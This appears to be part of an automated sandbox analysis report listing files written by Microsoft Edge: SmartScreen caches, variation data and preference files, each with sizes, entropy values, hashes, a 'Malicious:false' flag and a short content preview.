                                                                                                                                                                                                                                                                                              Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                              MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                              SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                              SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                              SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):29
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                              MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                              SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                              SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                              SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):575056
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                              MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                              SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                              SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                              SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):460992
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                              MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                              SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                              SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                              SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\downloadCache

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):14
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.3787834934861767
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:ZK7q6:ZA
                                                                                                                                                                                                                                                                                              MD5:DF741B3F19D9DC2621EAF973C8C9FA9D
                                                                                                                                                                                                                                                                                              SHA1:F45F1D9791C05366A8A23322D497C89957E75E61
                                                                                                                                                                                                                                                                                              SHA-256:6E5DDBA6D7AA3B287EA364034E1F843E4146FF92C07D8426F4A7C4B0E6435006
                                                                                                                                                                                                                                                                                              SHA-512:650DE3F99038BFFBFEF41A9ACC0A06E15803550C6456D0BDEAC9EBE18AEA94AB3A0BB7D85B7A0230CE6F510F5E26FA739FE58924F355D7E3714EC37DAA4C70D2
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:downloadCache_

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\downloadCache_

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.023948700965957
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:YTyLSmafBoTf7hf3TozRLuLgfGBkGAeekVy8Hfjg9PIAclWACwY4Yn:YWLSGT7hf3To9LuLgfGBPAzkVj/EMlWL
                                                                                                                                                                                                                                                                                              MD5:8DE1A6232168268D940BAFCDB366A527
                                                                                                                                                                                                                                                                                              SHA1:77839BBA58090F492A37348C8F6F9A360C931C83
                                                                                                                                                                                                                                                                                              SHA-256:07944BA5E0D5854A73E8449503A66EF93F0B2127FCF1DCA483763DEBCBC96936
                                                                                                                                                                                                                                                                                              SHA-512:B4AAAF462AFB166C194A184F8104068D3C447F2C96411682D2896C2CA1BFE0700D46CEE88F4A4FDDD6A7A0B771BBEA858AE5D88A25A48CAAA641AE0575F459CE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"version":1,"cache_data":[{"file_hash":"59014bc64d802da7","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":0,"expiration_time":1733953230991671}]}

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                              MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                              SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                              SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                              SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:uriCache_

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.018471326712627
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:YTyLSmafBoTf7hf3TozRLuLgfGBkGAeekVy8HfzXNPIAclWAgg:YWLSGT7hf3To9LuLgfGBPAzkVj/T8lWO
                                                                                                                                                                                                                                                                                              MD5:EFCA4353C03810D6D2FBD6834C1D81C3
                                                                                                                                                                                                                                                                                              SHA1:020569730A08A29BB9B2D164AAB3A55C7B5C8CDC
                                                                                                                                                                                                                                                                                              SHA-256:FB49DC924C2427F39E1549D8F5BF56B6F5A628ED5A981AD67BA361BC14BB6537
                                                                                                                                                                                                                                                                                              SHA-512:6ECE191924C03A51AB8002D6A91825722F7B197D065920F081A89B320A22C86ACCCB50DBF79441EBD03A8152B09F034BAB672C4EC2B9D1A6B538A7133A98C730
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"version":1,"cache_data":[{"file_hash":"59014bc64d802da7","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1733953229534200}]}

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):85
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.3488360343066725
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQHn:YQ3Kq9X0dMgAEiLIFn
                                                                                                                                                                                                                                                                                              MD5:0E16444393CD322124146935AB837ECC
                                                                                                                                                                                                                                                                                              SHA1:AA1A3E9571E3E067421D940601965220711F24AD
                                                                                                                                                                                                                                                                                              SHA-256:1B5DE2BF736E2BB182CF64BD8A72BBBD6538A9F33DC8020223B2257BAD6F7D82
                                                                                                                                                                                                                                                                                              SHA-512:26C461B0493C5E0F26AA196CE94C0C9EA5D892220EBE882AF4BF2892469515E9B13056EF7AE0F9C429F45C14F334299CCFFA5BAB1547B3DA0E2FCE45131630A0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":3}

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\a0ed28f2-c43e-446a-a15f-76f85f0749e2.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):45714
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.0880020412572415
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:cMkbJrT8IeQc5W9fcQIuhDO6vP6OBDIvlqg5WbR6FFSsKRTxOCAolGoup1Xl3jV+:cMk1rT8He9f06tIv8s9Rolhu3VlXr4t
                                                                                                                                                                                                                                                                                              MD5:89F6D47E42CDBC4B53E1D34E8C4922F8
                                                                                                                                                                                                                                                                                              SHA1:FD49E5C8606D133D9EF5252D7E35D1871DA8FFDE
                                                                                                                                                                                                                                                                                              SHA-256:E53DAE76715FDE2CDE16B8196582214F77FCCE6CE574801F89BE6F16CD272078
                                                                                                                                                                                                                                                                                              SHA-512:715F676850268A11964C1D7A370B0C5AC7B071C291E3CDB05D1310ABE57F5B6C509A2A119DFC4FDA02312388639D5CF695DB9BA45A6B626553DC19C5FDAD3540
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852424"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\a50edf3d-7461-49d2-989b-0337adc6aefc.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):45637
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.088097985012584
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:sMkbJrT8IeQc5d9fchVhDO6vP6OBDIvlqg5WbR6FFSsKRTxOCAolGoup1Xl3jVzC:sMk1rT8H19fZ6tIv4s9Rolhu3VlXr4t
                                                                                                                                                                                                                                                                                              MD5:91775F9A3B20BE0EDFAD817776BC2B03
                                                                                                                                                                                                                                                                                              SHA1:C3A3C3BAC711BB5123B8D3B14C350716E783110F
                                                                                                                                                                                                                                                                                              SHA-256:2EDA0F21CE81ED2F2AE053B7A02672EF819384B321C59E237356AE9C01959CFA
                                                                                                                                                                                                                                                                                              SHA-512:3C473612BD23B0BEF110AD997A708B997DF9CDE9BA6927462BA39817A4B4ACE71801CD1DE8D92DE0317C947E0BE56A45E556A71589A97FDB328C7AFC08D31C19
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852424"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\c4bf28fe-2200-4ff0-a62a-b2446b82e4f3.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44616
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.09719757233552
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBSwuohDO6vP6OBDIvlyv5XTuMTmuK7cGoup1Xl3j0:z/Ps+wsI7ynEy6tIvL7chu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:7ACFFE5BBE963672BD18F1AE49C56EA1
                                                                                                                                                                                                                                                                                              SHA1:FFF2820BC48B5AF221F94D44DB8E12DC1FD1A56A
                                                                                                                                                                                                                                                                                              SHA-256:501D6FF0F797EB3F9CFB48FE3004CE7D976E09B08193B22F5B09170D0970093E
                                                                                                                                                                                                                                                                                              SHA-512:5F28D56C304B84A5083169C193035199B1BC771CB2EB218B7C973D33DD5E3E98F9CA2F30BEAEF63CF639A9B8306C0D4BE29E35B029548A8531A84EAF04C3261F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\c5fb098f-3799-4c30-9171-c55dff1fecc3.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):45637
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.088081398636833
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:cMkbJrT8IeQc5d9fcQIuhDO6vP6OBDIvlqg5WbR6FFSsKRTxOCAolGoup1Xl3jV+:cMk1rT8H19f06tIv4s9Rolhu3VlXr4t
                                                                                                                                                                                                                                                                                              MD5:7C37225515781DD53E6FD88A1EE381C0
                                                                                                                                                                                                                                                                                              SHA1:E942400B0170341C07F9B0FFCEA18D9E6003DE71
                                                                                                                                                                                                                                                                                              SHA-256:F976EE1015CAEE46B448257EAEF4B927DFFDA00D5EE713D1182CFDAD4D2B97B0
                                                                                                                                                                                                                                                                                              SHA-512:7485CEBC59735EDFDB786F782751DEBF5B23A6FD35C17CAE191AA530F60087572733670E78464A400A1EAF62FEB0D60121057023AB599D737D6E5579D38DB252
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852424"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\fa2e6928-dcfe-4e02-8acd-c642dba8f565.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44137
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.090712595208555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMYwuF9hDO6vP6O+Ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEq6Etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:73DF81E396DAE87AF398D8AB243AB1B5
                                                                                                                                                                                                                                                                                              SHA1:D3AB453F63D56C98D969E707BBA12253F600FB47
                                                                                                                                                                                                                                                                                              SHA-256:90C49E3412F0337C8BD69B1A6D6182C867A33F01B74CDB2E14FA15FEB5606BE8
                                                                                                                                                                                                                                                                                              SHA-512:824D9B0666E3E40542C5A86ED7007C8546FE27D07A962A3052EB4DF28ECC6844D236DFF99F30DCA334D7D743570B695F8CF439CE126EB3F038A7A9C818D99E52
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

